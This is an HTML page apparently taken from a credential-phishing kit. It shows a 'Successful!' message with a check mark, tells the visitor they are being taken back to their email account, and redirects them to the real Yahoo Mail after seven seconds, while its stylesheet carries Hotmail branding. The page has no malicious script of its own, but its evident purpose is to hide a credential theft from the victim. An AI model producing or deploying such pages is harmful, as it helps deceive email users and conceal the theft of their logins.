<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Success</title>
<meta name="generator" content="WYSIWYG Web Builder 10 - http://www.wysiwygwebbuilder.com">
<meta http-equiv="refresh" content="7; URL=https://mail.yahoo.com">
<link href="Hotmail.css" rel="stylesheet" type="text/css">
<link href="success.css" rel="stylesheet" type="text/css">
</head>
<body>
<div id="wb_Text2" style="position:absolute;left:444px;top:432px;width:268px;height:75px;text-align:center;z-index:0;">
<span style="color:#000000;font-family:'Microsoft JhengHei UI';font-size:20px;">Successful!<br>wait while we take you back to your email account.</span></div>
<div id="wb_Text1" style="position:absolute;left:333px;top:328px;width:379px;height:16px;text-align:center;z-index:1;">
&nbsp;</div>
<div id="wb_Image2" style="position:absolute;left:164px;top:2px;width:800px;height:600px;z-index:2;">
<img src="images/check.gif" id="Image2" alt=""></div>
<div id="wb_Text3" style="position:absolute;left:444px;top:432px;width:268px;height:75px;text-align:center;z-index:3;">
<span style="color:#000000;font-family:'Microsoft JhengHei UI';font-size:20px;">Successful!<br>wait while we take you back to your email account.</span></div>
</body>
</html>